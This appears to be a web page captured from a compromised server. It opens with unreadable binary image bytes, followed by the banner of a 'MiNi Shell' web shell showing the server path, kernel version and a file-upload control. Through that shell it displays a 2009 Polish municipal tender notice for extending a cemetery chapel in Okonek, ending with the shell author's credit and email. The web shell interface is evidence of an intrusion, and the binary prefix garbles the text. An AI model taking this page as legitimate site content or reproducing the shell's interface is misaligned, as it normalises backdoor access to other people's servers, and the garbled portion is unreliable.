JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/161643-N-2009.html

<p class="kh_header"><b>Okonek: ROZBUDOWA KAPLICY PRZYCMENTARNEJ W OKONKU</b><br>
<b>Numer ogłoszenia: 161643 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Okonek , ul. Niepodległości 53, 64-965 Okonek, woj. wielkopolskie, tel. 067 2660957, 2669003, faks 067 2669976.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.okonek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWA KAPLICY PRZYCMENTARNEJ W OKONKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje  :

1. Rozbudowę zaprojektowano jako parterową nie podpiwniczoną z dachem dwuspadowym powtarzającym układ i spadki istniejącej kaplicy.
2. Dane gabarytowe rozbudowy				                    
- powierzchnia  zabudowy - 60,20 m2 ; pow. całkowita 197,72 m2
- powierzchnia  użytkowa - 53,17 m2	; pow. całkowita 149.13 m2
- kubatura - 394,53 m3 ; pow. całkowita 998,38 m3
3. Program użytkowy rozbudowanej kaplicy.
a) przebieralnia ( 3,15 m2 ), krypta ( 10,6 m2 ), zaplecze ( 3,9 m2 ), kaplica         ( 131,48 m2 ), RAZEM 149,13 m2 

4. Przed rozbudową należy rozebrać część budynku istniejącego. Dotyczy to części frontowej budynku tj. zadaszonych podcieni oraz ściany frontowej. Inwestor może podjąć decyzję o całkowitej zmianie podbitki znajdującej się w części istniejącej stanowiącej sufit drewniany, choć jej stan techniczny jest dobry.
II. Dane architektoniczno-materiałowe.  

1. Ściany zew.  i filarki gr.38cm z cegły ceramicznej pełnej kl.15 na zaprawie cem.-wap. M5.
2. Ścianki działowe gr. 12cm z cegły ceramicznej pełnej kl.15 na zaprawie cem.-wap. M5.
3. Podłogi : płytki  ceramiczne lub gresowe,  
4. Posadzki: posadzka z betonu B20 gr.12cm
5. Izolacja cieplna - brak, ponieważ budynek jest nieogrzewany.
6. Izolacja  przeciwwilgociowa  :
a) ściany fundamentowe - systemowa taśma izolacyjna
b) posadzki - folia budowlana gruba (paroizolacja) 
c) ściany fundamentowe zagruntować dwukrotnie  emulsją ATLAS UNI-GRUNT
7. Wentylacja  
a) Wentylacja grawitacyjna
b) Nawiew przez infiltrację stolarki okiennej i drzwiowej. 
8. Wykończenie ścian wewnętrznych.- tynk  cem. - wap. kat. III wykończony gładzią gipsową pomalowaną farbą  emulsyjną. 
9. Wykończenie sufitów  jak w części istniejącej z desek.
10. Elewacja -  tynk szlachetny mineralny ATLAS CERMIT DR 20 i cegła klinkierowa.
11. Pokrycie  dachu - dachówka ceramiczna.
12. Rynny, rury  spustowe i obróbki  blacharskie  z  blachy powlekanej w kolorze brązowym.
13. Stolarka   drzwiowa i okienna  -  drewniana. W pomieszczeniu kaplicy istniejące okna do wymiany.
14. Budynek będzie wyposażony w instalację elektryczną i odgromową.
III. Dane wyjściowe.
1. Warunki  gruntowe.
Na podstawie próbnych wykopów przyjęto, że od  poziomu  posadowienia fundamentów  do głębokości  przynajmniej około 1.5 m  zalegają  piaski drobne lekko zaglinione,  średniozagęszczone ID = 0,40. Wierzchnią warstwę około 20cm stanowi humus porośnięty trawą.
Woda gruntowa poniżej posadowienia fundamentów.
Warunki gruntowe - proste warunki gruntowe.
Kategoria geotechniczna - pierwsza.
Przyjęto  (Zero  budowlane ) na  rzędnej  131.9 m n.p.m. 
Posadowienie fundamentów na głębokości -1.30 i -1.40m poniżej poziomu (Zerowego)

Uwaga : W  przypadku  wystąpienia  innych  warunków  gruntowo-wodnych   
    konstrukcję i  poziom posadowienia  fundamentów  należy  ustalić  z  projektantem. Ewentualne grunty luźne należy wymienić na pospółkę piaskowo żwirową zagęszczaną warstwami co 30cm do stopnia ID=0.5 lub na chudy beton.
IV. Dane konstrukcyjno - materiałowe.
1. Fundamenty - żelbetowe z betonu B15, zbrojone stalą A-III(34GS) i A-0(St0). 
Dla zakotwienia trzpieni żelbetowych ze stóp fundamentowych wypuścić pręty. Zbrojenie podłużne ław fundamentowych przepuścić przez stopy fundamentowe.
2. Ściany fundamentowe gr.38cm z bloczków żwirobetonowych M-6 kl.15 na zaprawie cementowej M5.
3. Ściany kondygnacji.
Ściany konstrukcyjne i filarki gr.38cm z cegły ceramicznej pełnej kl.15 na zaprawie 
cem.-wap. M5.
4. Podciągi, nadproża, wieńce i trzpienie filarków murowanych z betonu B20, zbrojone stalą A-III(34GS) i A-0(St0S-b).
5. Stropodach.
a) Konstrukcja stropu drewniana. Belki 10x16 co 71cm oparte na podciągach i wieńcach żelbetowych.
a) Pochylenie dachu 46°. Konstrukcja więźby - płatwiowo-kleszczowa, z ramą dwustolcową z drewna klasy C30. Połączenia elementów drewnianych za pośrednictwem systemowych i indywidualnych łączników metalowych oraz na złącza ciesielskie.
Konstrukcję drewnianą należy zabezpieczyć środkami grzybobójczymi i ognioochronnymi np. FOBOS, SOLTOX R12, TYTAN. Środków tych należy używać zgodnie z instrukcją stosowania. Miejsca wrębów i zaciosów należy zabezpieczyć przed montażem. Wszystkie elementy drewniane izolować w styku ze ścianą lub elementami żelbetowymi warstwą 2x papa.
6. Pokrycie dachu - dachówka ceramiczna.
7. Posadzki.Posadzka z betonu B20 gr.12cm. Podkład z betonu B10 gr.10cm na podsypce piaskowo-żwirowej gr.20cm zagęszczonej do wskaźnika ID=0.6.
8.Izolacja przeciwwilgociowa pozioma. Posadzka 2x folia budowlana gruba PE 0,2mm.
V. Dane statyczno-konstrukcyjne.
Układ konstrukcyjny - poprzeczny o rozpiętości 7,7m.
Schematy statyczne:
a) Elementy więźby dachowej  - belki wolnopodparte
b) Podciągi, nadproża żelbetowe - belki wolnopodparte
Zestawienie obciążeń:
a) Obciążenie śniegiem - II strefa
b) Obciążenie wiatrem - I strefa
c) Ściana z cegły z tynkiem 0,38x18x1,1+0,03x19x1,3=8,3kN/m2
Wyniki obliczeń dla podstawowych elementów konstrukcyjnych:
a) Nośność ławy fundamentowej mQfNB = 180kPa > Qr = 132kPa
b) Podciąg żelbetowy PZ-1 - MSd=80kNm < MRd=100kNm
c) Krokwie, płatwie - stopień wykorzystania 60%, ugięcie mniejsze od L/250
Szczegółowy zakres prac i robot budowlanych przewidzianych do wykonania znajduje się w przedmiarach robot oraz dokumentacji projektowej budowlanej I wewnętrznej instalacji elektrycznej, które stanowią załącznik do ogłoszenia i SIWZ, znajdujących się na stronie internetowej www.okonek.pl ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.28.00-9, 45.26.27.00-8, 45.31.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia obowiązującego wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział wykonawcy, którzy :   
   
1) posiadają uprawnienie do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, osobami zdolnymi do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ust. 1 i 2 ustawy  Pzp.

Ad. 1)
1. są uprawnieni do działalności zgodnie z wymaganiami ustawowymi, 
2. posiadają uprawnienia do wykonywania czynności objętych zamówieniem zgodnie z wymaganiami ustawowymi, w tym względzie dysponują osobami posiadającymi odpowiednie kwalifikacje budowlane do kierowania robotami będącymi przedmiotem zamówienia ( art. 42 ust. 3 ustawy Prawo budowlane ) 

Ad. 2)
a) wykażą i udokumentują ( referencje lub opinie lub listy polecające ) w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - za ten okres) wykonanie robót budowlanych odpowiadających przedmiotowi zamówienia i o wartości nie mniejszej niż 150.000 zł każda,
b) dysponują pracownikami posiadającymi odpowiednie kwalifikacje do wykonania robót tj. specjaliści drogownictwa,
c) dysponują sprzętem niezbędnym do realizacji zamówienia.

Ad. 3) 
1. znajdują się w sytuacji finansowej i ekonomicznej gwarantującej wykonanie robót w ustalonym terminie, w tym względzie posiadają własne środki,
2. posiadają możliwości sfinansowania wykonanych robót ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki:
1) wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik
   nr 1 do niniejszej specyfikacji,
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,
3) Oświadczenie, zgodnie z art. 44 o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych z wykorzystaniem wzoru -  załącznik nr 2 do niniejszej specyfikacji,
4) Oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych                     z wykorzystaniem wzoru - załącznik nr 3 do niniejszej specyfikacji.
5) Oświadczenia o :
a) udzieleniu 36 miesięcznego okresu gwarancji jakości na wykonane roboty,
b) uporządkowaniu terenu po zakończeniu robót,
c) terminie wykonania zamówienia,
6) Kosztorys ofertowy opracowany metodą uproszczoną na podstawie dokumentacji projektowej oraz :
a) wskaźniki kalkulacyjne tj. rbh, koszty pośrednie (łącznie z kosztami zakupu ), zysk,
b) zestawienie materiałów wraz z cenami ( nie mogą być inne niż podane w kosztorysie ofertowym ).
7) Wykaz kadry kierowniczej i personelu przewidzianego do wykonania robót  wraz
    z informacją na temat kwalifikacji zawodowych tych osób ( krótki opis 
    doświadczeń zawodowych ). 
8) Wykaz niezbędnego sprzętu do wykonania zamówienia.
8) Wykaz wykonanych przez wykonawcę w okresie ostatnich 5 lat robót 
     odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, a jeżeli okres działalności jest krótszy od w/w, za ten  okres.  Wykaz powinien zawierać : 
a) nazwę i adres zamawiającego, 
b)rodzaj wykonanych robót, które odpowiadają robotom będącym przedmiotem zamówienia (wraz ze wskazaniem danych szczegółowych opisanych w warunku) , 
c) termin ich rozpoczęcia i zakończenia, 
d) wartość robót.
9) Dokumenty potwierdzające, że roboty zostały wykonane należycie, np. referencje lub opinie, protokoły odbioru albo listy polecające..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.okonek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, 64-965 OKONEK, ul. Niepodległości 53.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 10:00, miejsce: Urząd Miejski, 64-965 OKONEK, ul. Niepodległości 53 - Punkt Obsługi Interesanta, budynek B, pokój nr 18a.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com